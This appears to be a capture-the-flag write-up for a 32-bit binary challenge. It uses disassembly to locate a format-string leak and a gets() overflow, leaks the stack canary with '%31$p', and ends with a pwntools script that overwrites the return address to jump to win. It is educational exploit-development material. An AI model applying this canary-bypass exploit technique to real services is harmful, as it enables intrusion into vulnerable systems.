canarywharf | 04/20/26

Description

We found a secret EvilCorp terminal, guarded by a vicious stack canary. Use your hacking knowledge to avoid the canary and find the flag!

To follow along with the challenge, download the binary here.

Observations

For this challenge, all we're given is the binary (ELF) file. To start, we should see what kind of binary we're working with:

[pwn@h4x0r-b0x]% checksec canarywharf
[*] '/home/pwn/canarywharf'
    Arch:       i386-32-little
    RELRO:      No RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No

First the good news: we're dealing with a very old architecture (i386-32) which has a pretty simple calling convention, so hopefully the code will be easy to look through. Also, No PIE means the binary itself is always loaded at 0x8048000, so the addresses of its own code and data stay fixed even if ASLR is enabled on the system, which is nice! Finally, this binary isn't stripped, which should make it much easier to figure out what it's doing!

Unfortunately, it looks like stack canaries are enabled like the challenge description indicated. This will make ROP-style attacks harder, but hopefully we can find a way to leak the canary if we need to perform any buffer overflows that extend past the local variable section of a stack frame.

We can also run strings to quickly scan for interesting things in the binary. Note I've truncated some uninteresting output with the ellipses:

[pwn@h4x0r-b0x]% strings canarywharf
__gmon_start__
flag.txt
flag.txt not found.
*** ACCESS GRANTED ***
Flag: %s
[SECURITY TERMINAL v1.3]
...
printf@GLIBC_2.0
strcspn@GLIBC_2.0
fflush@GLIBC_2.0
stderr@GLIBC_2.0
vuln
fgets@GLIBC_2.0
_edata
fclose@GLIBC_2.1
_fini
__stack_chk_fail@GLIBC_2.4
...

This doesn't tell us a whole lot, but there's a vuln symbol mixed in with a bunch of function names that could be interesting. There's also a flag.txt that it looks like the program is prepared to open and print.

With that in mind, it's time to look through the binary. This is a pretty small one, so I'll be sticking with objdump, but Ghidra/Binary Ninja could be helpful for players who're less comfortable reading assembly. Let's start with our main function:

08049422 <main>:
 ...
 8049452: 6a 00                         pushl   $0x0
 8049454: 6a 02                         pushl   $0x2
 8049456: 6a 00                         pushl   $0x0
 8049458: 50                            pushl   %eax
 8049459: e8 72 fc ff ff                calll   0x80490d0 <setvbuf@plt>
 804945e: 83 c4 10                      addl    $0x10, %esp
 8049461: 8b 83 f0 ff ff ff             movl    -0x10(%ebx), %eax
 8049467: 8b 00                         movl    (%eax), %eax
 8049469: 6a 00                         pushl   $0x0
 804946b: 6a 02                         pushl   $0x2
 804946d: 6a 00                         pushl   $0x0
 804946f: 50                            pushl   %eax
 8049470: e8 5b fc ff ff                calll   0x80490d0 <setvbuf@plt>
 8049475: 83 c4 10                      addl    $0x10, %esp
 8049478: 8b 83 f8 ff ff ff             movl    -0x8(%ebx), %eax
 804947e: 8b 00                         movl    (%eax), %eax
 8049480: 6a 00                         pushl   $0x0
 8049482: 6a 02                         pushl   $0x2
 8049484: 6a 00                         pushl   $0x0
 8049486: 50                            pushl   %eax
 8049487: e8 44 fc ff ff                calll   0x80490d0 <setvbuf@plt>
 804948c: 83 c4 10                      addl    $0x10, %esp
 804948f: e8 39 fe ff ff                calll   0x80492cd <vuln>
 ...

It looks like there isn't really much going on here. There's some initialization with the setvbuf function, but the most interesting part is calling vuln at 804948f. That function will likely be more interesting!

Getting the Flag

Before we look at that, though, it would be helpful to know what our final goal is. There's a win symbol in objdump's output which will likely help us figure that out:

080491f2 <win>:
 ...
 80491fc: e8 2f ff ff ff                calll   0x8049130 <__x86.get_pc_thunk.bx>
 8049201: 81 c3 1b 21 00 00             addl    $0x211b, %ebx           # imm = 0x211B
 ...
 8049215: 8d 83 ec ec ff ff             leal    -0x1314(%ebx), %eax
 804921b: 50                            pushl   %eax
 804921c: 8d 83 ee ec ff ff             leal    -0x1312(%ebx), %eax
 8049222: 50                            pushl   %eax
 8049223: e8 b8 fe ff ff                calll   0x80490e0 <fopen@plt>
 8049228: 83 c4 10                      addl    $0x10, %esp
 804922b: 89 85 70 ff ff ff             movl    %eax, -0x90(%ebp)
 8049231: 83 bd 70 ff ff ff 00          cmpl    $0x0, -0x90(%ebp)
 8049238: 75 1c                         jne 0x8049256 <win+0x64>
 ...
 8049256: 83 ec 04                      subl    $0x4, %esp
 8049259: ff b5 70 ff ff ff             pushl   -0x90(%ebp)
 804925f: 68 80 00 00 00                pushl   $0x80
 8049264: 8d 85 74 ff ff ff             leal    -0x8c(%ebp), %eax
 804926a: 50                            pushl   %eax
 804926b: e8 10 fe ff ff                calll   0x8049080 <fgets@plt>
 8049270: 83 c4 10                      addl    $0x10, %esp
 8049273: 83 ec 0c                      subl    $0xc, %esp
 8049276: ff b5 70 ff ff ff             pushl   -0x90(%ebp)
 804927c: e8 0f fe ff ff                calll   0x8049090 <fclose@plt>
 8049281: 83 c4 10                      addl    $0x10, %esp
 8049284: 83 ec 0c                      subl    $0xc, %esp
 8049287: 8d 83 0b ed ff ff             leal    -0x12f5(%ebx), %eax
 804928d: 50                            pushl   %eax
 804928e: e8 1d fe ff ff                calll   0x80490b0 <puts@plt>
 8049293: 83 c4 10                      addl    $0x10, %esp
 8049296: 83 ec 08                      subl    $0x8, %esp
 8049299: 8d 85 74 ff ff ff             leal    -0x8c(%ebp), %eax
 804929f: 50                            pushl   %eax
 80492a0: 8d 83 23 ed ff ff             leal    -0x12dd(%ebx), %eax
 80492a6: 50                            pushl   %eax
 80492a7: e8 94 fd ff ff                calll   0x8049040 <printf@plt>
 80492ac: 83 c4 10                      addl    $0x10, %esp
 80492af: 8b 83 fc ff ff ff             movl    -0x4(%ebx), %eax
 80492b5: 8b 00                         movl    (%eax), %eax
 80492b7: 83 ec 0c                      subl    $0xc, %esp
 80492ba: 50                            pushl   %eax
 80492bb: e8 a0 fd ff ff                calll   0x8049060 <fflush@plt>
 80492c0: 83 c4 10                      addl    $0x10, %esp
 80492c3: 83 ec 0c                      subl    $0xc, %esp
 80492c6: 6a 00                         pushl   $0x0
 80492c8: e8 f3 fd ff ff                calll   0x80490c0 <exit@plt>

Given the strings output we saw earlier, it seems likely that these fopen, fgets, and printf function calls will open flag.txt and print its contents out for us.

Statically validating that win really does print the flag

We can validate that this function really does print flag.txt by checking the values stored at the pointers that're passed into fopen and printf. Since the binary isn't position-independent, its addresses are fixed, so this is pretty easy to do:

Both pointers we're interested in (loaded by the leal instructions just before the fopen and printf calls above) point to specific offsets from %ebx. To calculate their absolute addresses, we first need to know the base address stored in %ebx. This value is set near the top of the function with the instructions:
```
80491fc: e8 2f ff ff ff                 calll   0x8049130 <__x86.get_pc_thunk.bx>
8049201: 81 c3 1b 21 00 00              addl    $0x211b, %ebx           # imm = 0x211B
```
__x86.get_pc_thunk.bx is a function that just loads its own return address into %ebx so that the program can calculate offsets based on this. 32-bit x86 code can't read %eip directly, so __x86.get_pc_thunk.bx takes advantage of the return address on the stack, which is the address of the instruction right after the call.

In this case, that means that before 8049201 executes, %ebx will have a value of 0x8049201. That addl instruction adds 0x211b to create our final base address.

Doing this math gives us a base address 0x8049201 + 0x211b = 0x804b31c.
Now that we have this base address, we just need to calculate the addresses generated by the leal instructions at 804921c (fopen's path; the leal at 8049215 loads its mode string) and 80492a0 (printf's format string):
- 0x804b31c - 0x1312 = 0x804a00a
- 0x804b31c - 0x12dd = 0x804a03f

Strings like this are usually stored in the .rodata section, so we can use objdump to inspect that section and look for the addresses we've identified.

[pwn@h4x0r-b0x]% objdump -s -j .rodata canarywharf

canarywharf:    file format elf32-i386
Contents of section .rodata:
 804a000 03000000 01000200 7200666c 61672e74  ........r.flag.t
 804a010 78740066 6c61672e 74787420 6e6f7420  xt.flag.txt not 
 804a020 666f756e 642e000a 2a2a2a20 41434345  found...*** ACCE
 804a030 53532047 52414e54 4544202a 2a2a0046  SS GRANTED ***.F
 804a040 6c61673a 2025730a 000a5b53 45435552  lag: %s...[SECUR
 804a050 49545920 5445524d 494e414c 2076312e  ITY TERMINAL v1.
 804a060 335d003d 3d3d3d3d 3d3d3d3d 3d3d3d3d  3].=============
 804a070 3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d00  ===============.
 804a080 456e7465 7220796f 75722075 7365726e  Enter your usern
 804a090 616d653a 20000a00 48656c6c 6f2c2000  ame: ...Hello, .
 804a0a0 21000a45 6e746572 20616363 65737320  !..Enter access 
 804a0b0 636f6465 3a200041 63636573 73206465  code: .Access de
 804a0c0 6e696564 2e00                        nied..

Sure enough, fopen is given the string "flag.txt" and printf is given the string "Flag: %s\n"!
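The address arithmetic can be double-checked with a few lines of Python. This is only a sketch and not part of the original solve: the RODATA bytes are copied by hand from the first five rows of the objdump output above, and the helper name cstring is made up for illustration. It takes %ebx to be the return address of the thunk call (0x8049201) plus the addl immediate (0x211b).

```python
# Sanity-check which strings win's leal instructions point at.
# RODATA holds the first 0x50 bytes of .rodata, copied from the objdump dump.
RODATA_BASE = 0x804A000
RODATA = bytes.fromhex(
    "03000000010002007200666c61672e74"  # 804a000
    "787400666c61672e747874206e6f7420"  # 804a010
    "666f756e642e000a2a2a2a2041434345"  # 804a020
    "5353204752414e544544202a2a2a0046"  # 804a030
    "6c61673a2025730a000a5b5345435552"  # 804a040
)


def cstring(addr: int) -> bytes:
    """Return the NUL-terminated string stored at an absolute address."""
    start = addr - RODATA_BASE
    end = RODATA.index(b"\x00", start)
    return RODATA[start:end]


# %ebx = return address of the thunk call + the addl immediate
EBX = 0x8049201 + 0x211B

for label, offset in [
    ("fopen mode", 0x1314),
    ("fopen path", 0x1312),
    ("puts arg", 0x12F5),
    ("printf fmt", 0x12DD),
]:
    addr = EBX - offset
    print(f"{label}: {addr:#x} -> {cstring(addr)!r}")
```

Every leal offset in win should resolve to a string that starts exactly on a NUL boundary in the dump, which is a handy signal that the base address is right.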

Looking through the disassembly, it doesn't look like there are any places where win is called. Instead, it looks like this is a ret2win challenge where we'll need to overwrite some return address to jump to win without modifying the canary that guards it.

Leaking Memory

Now that we know we'll need to overwrite a return pointer without disturbing the corresponding canary, we need to find a way to gain access to the canary's value. If we can find a way to do this, we can overwrite the canary with itself to avoid tripping the alarm and terminating the program while exploiting a buffer overflow to modify a function's return address.

One common way this can be done is by passing malicious input to printf. There are enough powerful format specifiers that, if we can control the format string (first argument), we can leak almost any memory we want. As noted earlier, the only hardcoded string with a format specifier in it is the one to print the flag. By looking for other uses of printf, we can hopefully find a spot where an attacker-controlled string is used as its first argument.

As it turns out, the vuln function uses printf quite a bit:

080492cd <vuln>:
 ...
 804930e: 83 ec 0c                      subl    $0xc, %esp
 8049311: 8d 83 64 ed ff ff             leal    -0x129c(%ebx), %eax
 8049317: 50                            pushl   %eax
 8049318: e8 23 fd ff ff                calll   0x8049040 <printf@plt>
 ...
 804932c: e8 2f fd ff ff                calll   0x8049060 <fflush@plt>
 8049331: 83 c4 10                      addl    $0x10, %esp
 8049334: 8b 83 f8 ff ff ff             movl    -0x8(%ebx), %eax
 804933a: 8b 00                         movl    (%eax), %eax
 804933c: 83 ec 04                      subl    $0x4, %esp
 804933f: 50                            pushl   %eax
 8049340: 6a 20                         pushl   $0x20
 8049342: 8d 45 94                      leal    -0x6c(%ebp), %eax
 8049345: 50                            pushl   %eax
 8049346: e8 35 fd ff ff                calll   0x8049080 <fgets@plt>
 ...
 8049364: c6 44 05 94 00                movb    $0x0, -0x6c(%ebp,%eax)
 8049369: 83 ec 0c                      subl    $0xc, %esp
 804936c: 8d 83 7c ed ff ff             leal    -0x1284(%ebx), %eax
 8049372: 50                            pushl   %eax
 8049373: e8 c8 fc ff ff                calll   0x8049040 <printf@plt>
 8049378: 83 c4 10                      addl    $0x10, %esp
 804937b: 83 ec 0c                      subl    $0xc, %esp
 804937e: 8d 45 94                      leal    -0x6c(%ebp), %eax
 8049381: 50                            pushl   %eax
 8049382: e8 b9 fc ff ff                calll   0x8049040 <printf@plt>
 ...
 80493b0: 83 ec 0c                      subl    $0xc, %esp
 80493b3: 8d 83 86 ed ff ff             leal    -0x127a(%ebx), %eax
 80493b9: 50                            pushl   %eax
 80493ba: e8 81 fc ff ff                calll   0x8049040 <printf@plt>
 ...
 8049421: c3                            retl

Looking at the arguments to these printf invocations, the third one takes a local variable -0x6c(%ebp) as its format string instead of a pointer to .rodata! This is a promising sign for allowing us to control its value. Looking further, this address is also the destination address for fgets to write to! This means anything we pass in to STDIN will get sent to printf as the format string! There are a number of ways we could potentially use this to aid our attack.

Overflowing a Buffer

Now that we can leak memory using printf, we need to know what memory is useful to leak. Obviously we want to leak a canary, and each protected stack frame stores its own copy of it (the value itself is read from %gs:0x14 and is shared across the whole process). The copy we really care about is the one that protects the return address that we will replace with win's address. To figure out which one this is, we need to find a buffer overflow vulnerability that allows us to overwrite the return address of the function it's located in.

While the fgets call we just looked at allows attacker control over the printf format string, it does not let us overwrite anything important on the stack. It's bounded to store at most 0x20 = 32 bytes (31 characters plus a terminating null byte), and -0x6c(%ebp) + 0x20 = -0x4c(%ebp) is nowhere near 0x4(%ebp) where vuln's return address is.

Thankfully, though, the call graph for this program is super simple. There are only 3 functions defined: main, which calls vuln, and win, which is never called. Since win is never called, the vulnerability can't be there. main just does some setup that doesn't allow room for an attack, so the vulnerability can't be there. By process of elimination, there must be another vulnerability in vuln that allows a buffer overflow.

Sure enough, further on in the function is another call to read from STDIN:

080492cd <vuln>:
 ...
 80493b0: 83 ec 0c                      subl    $0xc, %esp
 80493b3: 8d 83 86 ed ff ff             leal    -0x127a(%ebx), %eax
 80493b9: 50                            pushl   %eax
 80493ba: e8 81 fc ff ff                calll   0x8049040 <printf@plt>
 80493bf: 83 c4 10                      addl    $0x10, %esp
 80493c2: 8b 83 fc ff ff ff             movl    -0x4(%ebx), %eax
 80493c8: 8b 00                         movl    (%eax), %eax
 80493ca: 83 ec 0c                      subl    $0xc, %esp
 80493cd: 50                            pushl   %eax
 80493ce: e8 8d fc ff ff                calll   0x8049060 <fflush@plt>
 80493d3: 83 c4 10                      addl    $0x10, %esp
 80493d6: 83 ec 0c                      subl    $0xc, %esp
 80493d9: 8d 45 b4                      leal    -0x4c(%ebp), %eax
 80493dc: 50                            pushl   %eax
 80493dd: e8 8e fc ff ff                calll   0x8049070 <gets@plt>

The gets function is deprecated (and was removed from the C standard in C11) because its lack of bounds checking makes it inherently unsafe. This means we have unbounded write access to the stack from STDIN when this function is called!

Exploit

Leaking the Canary

Now that we know vuln contains both a vulnerability to leak memory and a vulnerability to overwrite data on the stack, it's clear that we can use these to overwrite vuln's return address while preserving the canary. Next, we need to figure out where the canary is in the stack so we can ensure it's preserved when we overwrite the stack frame.

Our specific method for leaking memory from the stack will be using the "%X$p" format specifier, where X is replaced by an integer. This format specifier's purpose is printing an argument passed to printf by index (for example, "%7$p" prints the 7th argument after the format string). Since the C ABI for the i386 architecture passes all function arguments on the stack, specifying larger numbers than there are arguments to printf means that data further up the stack will be printed instead. Rather than knowing the exact memory address of the canary, we just need to figure out what index to replace X with in this specifier.
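When the right index isn't known yet, one option is to probe several positions in a single run. Below is a rough sketch of a helper for that; the name probe and the "." separator are made up for illustration. The size limit comes from the 0x20 passed to fgets in vuln: fgets stores at most 31 characters, and one of those needs to be the newline, otherwise the leftover newline would be consumed by the later gets call as an empty access code.

```python
FGETS_SIZE = 0x20  # size argument passed to fgets in vuln

# 1 byte for the terminating NUL, 1 byte for the newline sent after the payload
MAX_PAYLOAD = FGETS_SIZE - 2


def probe(first: int, last: int) -> bytes:
    """Build a format string that prints stack words first..last as pointers."""
    payload = ".".join(f"%{i}$p" for i in range(first, last + 1)).encode()
    if len(payload) > MAX_PAYLOAD:
        raise ValueError(
            f"probe is {len(payload)} bytes, limit is {MAX_PAYLOAD}"
        )
    return payload


# Dump the first six argument slots; shift the range to look further up the stack
print(probe(1, 6))
```

Since each run only fits about six indices, scanning a wide range takes several connections, which is why narrowing the candidates down with static analysis first is worthwhile.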

We can get a rough idea for where this is via static analysis. printf treats each of these arguments as a 4-byte stack slot, which means incrementing X will print a 4-byte word that's 4 bytes higher in memory each time. Looking at the stack setup code for vuln, the prologue leaves %esp at -0x78(%ebp) (4 bytes for the saved %ebx plus the 0x74-byte allocation), so the stack canary (-0xc(%ebp)) is 0x6c = 108 bytes (27 4-byte words) from the top of the stack frame in vuln:

080492cd <vuln>:
 80492cd: 55                            pushl   %ebp
 80492ce: 89 e5                         movl    %esp, %ebp
 80492d0: 53                            pushl   %ebx
 80492d1: 83 ec 74                      subl    $0x74, %esp
 80492d4: e8 57 fe ff ff                calll   0x8049130 <__x86.get_pc_thunk.bx>
 80492d9: 81 c3 43 20 00 00             addl    $0x2043, %ebx           # imm = 0x2043
 80492df: 65 a1 14 00 00 00             movl    %gs:0x14, %eax
 80492e5: 89 45 f4                      movl    %eax, -0xc(%ebp)
 ...

However, this doesn't consider the extra data that will be pushed to the stack when calling printf. This additional data includes any arguments passed to printf:

080492cd <vuln>:
 ...
 804937e: 8d 45 94                      leal    -0x6c(%ebp), %eax
 8049381: 50                            pushl   %eax
 8049382: e8 b9 fc ff ff                calll   0x8049040 <printf@plt>

In this case, there's just a 4-byte word for the pointer to the format string, pushed after the 12 bytes of padding reserved by the subl $0xc, %esp at 804937b. Since vuln's prologue leaves %esp at -0x78(%ebp), that puts the format string pointer at -0x88(%ebp) when printf is called (0x78 + 0xc + 0x4 = 0x88). The return address and anything printf saves for its own stack frame land below that pointer, so they don't affect the numbering: "%1$p" reads the word directly above the format string pointer, at -0x84(%ebp), and each increment of the index moves 4 bytes further up the stack.

The canary at -0xc(%ebp) is 0x88 - 0xc = 0x7c = 124 bytes above the format string pointer. This means that the stack canary can be accessed as argument 124 / 4 = 31 of printf via "%31$p".
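The index can be cross-checked by measuring from where the format string pointer sits at the moment of the call, since printf numbers its arguments upward from that slot. The sketch below does that arithmetic; the constant and function names are hypothetical, and the offsets are the ones read from vuln's disassembly (pushl %ebx, subl $0x74, the subl $0xc before the call, and the pushl of the format string).

```python
WORD = 4  # bytes per stack slot on i386

# Distances below %ebp, read from vuln's disassembly
FRAME_BOTTOM = 0x04 + 0x74   # pushl %ebx, then subl $0x74, %esp
CALL_PADDING = 0x0C          # subl $0xc, %esp before the printf call
FMT_POINTER = FRAME_BOTTOM + CALL_PADDING + WORD  # pushl %eax (format string)
CANARY = 0x0C                # canary lives at -0xc(%ebp)


def printf_index(offset_below_ebp: int) -> int:
    """Positional index N such that %N$p reads the word at -offset(%ebp)."""
    distance = FMT_POINTER - offset_below_ebp
    if distance % WORD != 0:
        raise ValueError("target is not word-aligned")
    return distance // WORD


print(printf_index(CANARY))
```

The same helper works for other slots in the frame: passing a negative offset reaches above %ebp, so printf_index(-0x4) gives the index of vuln's return address.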

Overwriting the Return Address

Now that we can perform a buffer overflow and have a way to get the stack canary for the function where this overflow vulnerability is, we just need to figure out the offsets for overwriting the canary and the return address in order to jump to win and get the flag! Looking back at the relevant parts of vuln, we can find the relevant addresses for calculating these offsets:

080492cd <vuln>:
 80492cd: 55                            pushl   %ebp
 80492ce: 89 e5                         movl    %esp, %ebp
 80492d0: 53                            pushl   %ebx
 80492d1: 83 ec 74                      subl    $0x74, %esp
 80492d4: e8 57 fe ff ff                calll   0x8049130 <__x86.get_pc_thunk.bx>
 80492d9: 81 c3 43 20 00 00             addl    $0x2043, %ebx           # imm = 0x2043
 80492df: 65 a1 14 00 00 00             movl    %gs:0x14, %eax
 80492e5: 89 45 f4                      movl    %eax, -0xc(%ebp)
 ...
 80493d6: 83 ec 0c                      subl    $0xc, %esp
 80493d9: 8d 45 b4                      leal    -0x4c(%ebp), %eax
 80493dc: 50                            pushl   %eax
 80493dd: e8 8e fc ff ff                calll   0x8049070 <gets@plt>

Our write access to the stack starts at -0x4c(%ebp), so we will need to write 0x40 = 64 bytes of padding to reach the stack canary at -0xc(%ebp). Then, after writing the canary, we'll need to overwrite 12 more bytes (the word at -0x8(%ebp), the saved %ebx at -0x4(%ebp), and the saved %ebp) to reach the return address at 0x4(%ebp). Finally, looking back at the disassembly of win, we need to write 0x080491f2 onto the stack so that retl will jump to win and print the flag.
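To make the layout concrete, here is a small sketch that derives both padding lengths from the %ebp-relative offsets instead of hardcoding them. It uses only the standard library (struct.pack in place of pwntools' p32), the names are hypothetical, and the canary value in the example is a made-up placeholder. It also rejects payloads containing a newline byte, since gets stops reading at the first newline.

```python
import struct

BUF_OFFSET = -0x4C      # gets writes starting at -0x4c(%ebp)
CANARY_OFFSET = -0x0C   # canary at -0xc(%ebp)
RET_OFFSET = 0x04       # return address at 0x4(%ebp)
WIN_ADDR = 0x080491F2   # address of win from the disassembly


def build_payload(canary: int) -> bytes:
    """Lay out padding, canary, padding, and win's address for the gets call."""
    pad_to_canary = CANARY_OFFSET - BUF_OFFSET      # 0x40 = 64 bytes
    pad_to_ret = RET_OFFSET - (CANARY_OFFSET + 4)   # 12 bytes
    payload = (
        b"A" * pad_to_canary
        + struct.pack("<I", canary)     # little-endian 32-bit canary
        + b"B" * pad_to_ret
        + struct.pack("<I", WIN_ADDR)   # new return address
    )
    if b"\n" in payload:
        # gets would stop at the newline and truncate the overflow
        raise ValueError("payload contains a newline byte")
    return payload


payload = build_payload(0xDEADBE00)  # placeholder canary, for illustration only
print(len(payload), payload[64:68].hex(), payload[80:84].hex())
```

If a leaked canary happens to contain a 0x0a byte, the simplest fix is usually to reconnect and try again with a fresh canary.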

Scripting a Solution

Putting this all together, we can write a short script using pwntools to perform this attack:

from pwn import *

p = remote('canarywharf.ctf-league.damsec.org', 1309)

p.sendline(b"%31$p")
p.recvuntil(b"Hello, ")         # Throw away the stuff before the start of the canary
res = p.recvuntil(b"!")[:-1]    # Grab the canary and discard the stuff that comes after
canary = int(res, 16)           # Convert the canary from a hex string to an integer

p.recvuntil(b'access code:')
p.sendline(
    b"A"*64 +       # Initial 64 bytes of garbage
    p32(canary) +   # Canary value to avoid overwriting
    b'A'*12 +       # 12 bytes of additional garbage
    p32(0x080491f2) # Address of `win`
)
p.interactive()
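If the script misbehaves, the leak is the first thing worth checking. The helper below is a hypothetical addition (not part of the script above) that parses the greeting and applies one sanity check: glibc on little-endian Linux zeroes the lowest byte of the canary, so a leaked value that doesn't end in 00 most likely means the index is off. The sample greeting in the example is made up.

```python
def parse_canary(line: bytes) -> int:
    """Extract the leaked canary from a b'Hello, 0x...!' greeting."""
    prefix = b"Hello, "
    start = line.index(prefix) + len(prefix)
    end = line.index(b"!", start)
    canary = int(line[start:end], 16)
    # Assumption: the target uses glibc, whose canaries have a zero low byte
    if canary & 0xFF != 0:
        raise ValueError(f"{canary:#x} does not look like a stack canary")
    return canary


# Made-up sample response, for illustration only
print(hex(parse_canary(b"Hello, 0x5fa3c100!\n")))
```

In the script, this could replace the manual slicing by passing it the bytes received up to and including the "!".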

Conclusion

Stack canaries make buffer overflows much more difficult to exploit! Instead of just identifying a buffer overflow and overwriting memory, attackers have to also find a way to leak memory and identify the canary to avoid tripping the stack protection guards and killing the program they're attempting to exploit. Just like ASLR, this is a powerful, low-cost method for increasing safety that you should think long and hard about before disabling.